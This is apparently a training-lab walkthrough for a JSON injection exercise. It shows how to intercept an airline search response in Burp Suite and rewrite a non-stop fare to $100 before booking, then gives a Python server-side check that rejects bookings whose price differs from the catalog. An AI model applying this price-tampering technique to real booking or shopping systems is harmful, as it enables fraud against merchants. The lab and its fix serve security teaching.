Ajax Security: JSON Injection

Goal: 

JSON is more widely used than XML because of its ease of use and speed. In this lab, the target is to perform JSON injection against an airline ticket system to get the non-stop ticket at a cheaper price.

Method: 

Use Burp Suite or another proxy tool to intercept the traffic and perform the JSON injection attack.

Step-by-step Guide

1. Start Burp Suite interception and make sure that response interception is also enabled. To enable response interception, go to Proxy => Options.


2. Enter the source and destination (BOS to SEA).

3. In Burp, click Forward for a couple of requests and you will see the intercepted response from the server.

4. Now modify the price of the non-stop ticket to $100, then forward the response:

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Cache-Control: no-cache
    Content-Type: text/html
    Date: Wed, 12 Jul 2017 00:16:34 GMT
    Connection: close
    Content-Length: 169

    {
      "From": "Boston",
      "To": "Seattle",
      "flights": [
        {"stops": "0", "transit" : "N/A", "price": "$100"},
        {"stops": "2", "transit" : "Newark,Chicago", "price": "$300"}
      ]
    }

5. The non-stop flight is now shown as $100; choose it and submit.
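The lab succeeds because the server takes the price from whatever the client posts back, so a value edited in the intercepted JSON is billed as-is. The following added example (not part of the lab or of WebGoat's code) shows the server-side fix: the booking is checked against the server's own catalog, the client-supplied price is only compared for a mismatch, and the price actually charged always comes from the catalog. The FLIGHT_CATALOG and its $600 non-stop fare are constructed for the example; the original fare is not shown on this page.

```python
import json
from decimal import Decimal, InvalidOperation

# Constructed catalog (assumption, not from the lab): the server's own
# authoritative price list for the BOS -> SEA route.
FLIGHT_CATALOG = {
    ("Boston", "Seattle"): {
        "0": {"transit": "N/A", "price": "$600"},
        "2": {"transit": "Newark,Chicago", "price": "$300"},
    }
}


def parse_price(text):
    """Turn a '$123' string into a Decimal; raise ValueError on anything else."""
    if not isinstance(text, str) or not text.startswith("$"):
        raise ValueError("price must look like '$NNN'")
    try:
        value = Decimal(text[1:])
    except InvalidOperation:
        raise ValueError("price is not numeric")
    if value <= 0:
        raise ValueError("price must be positive")
    return value


def search_flights(origin, destination):
    """Build the search response the client sees (same shape as the lab's JSON)."""
    route = FLIGHT_CATALOG.get((origin, destination))
    if route is None:
        return None
    return {
        "From": origin,
        "To": destination,
        "flights": [
            {"stops": stops, "transit": f["transit"], "price": f["price"]}
            for stops, f in route.items()
        ],
    }


def validate_booking(raw_json):
    """
    Validate a booking the client posted back.

    Returns (accepted, charged_price, reason). The charged price is always
    taken from FLIGHT_CATALOG; the client's 'price' field is only compared
    against it so a tampered value can be logged and refused.
    """
    try:
        booking = json.loads(raw_json)
    except json.JSONDecodeError:
        return False, None, "malformed JSON"
    for field in ("From", "To", "stops", "price"):
        if field not in booking:
            return False, None, f"missing field {field}"
    route = FLIGHT_CATALOG.get((booking["From"], booking["To"]))
    if route is None:
        return False, None, "unknown route"
    flight = route.get(str(booking["stops"]))
    if flight is None:
        return False, None, "unknown flight"
    catalog_price = parse_price(flight["price"])
    try:
        client_price = parse_price(booking["price"])
    except ValueError as exc:
        return False, None, f"bad price: {exc}"
    if client_price != catalog_price:
        # Tampering indicator: the client claims a price the server never offered.
        return False, None, (
            f"price mismatch: client sent ${client_price}, catalog says ${catalog_price}"
        )
    return True, catalog_price, "ok"


if __name__ == "__main__":
    print(json.dumps(search_flights("Boston", "Seattle"), indent=2))
    # Constructed booking mirroring the lab's tampered non-stop flight at $100.
    tampered = json.dumps({"From": "Boston", "To": "Seattle", "stops": "0", "price": "$100"})
    print(validate_booking(tampered))
    honest = json.dumps({"From": "Boston", "To": "Seattle", "stops": "0", "price": "$600"})
    print(validate_booking(honest))
```

The mismatch branch is also the detection hook: a rejected booking whose price differs from the catalog is a direct signal that a proxy was used to edit the response, and is worth logging with the session and client address.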
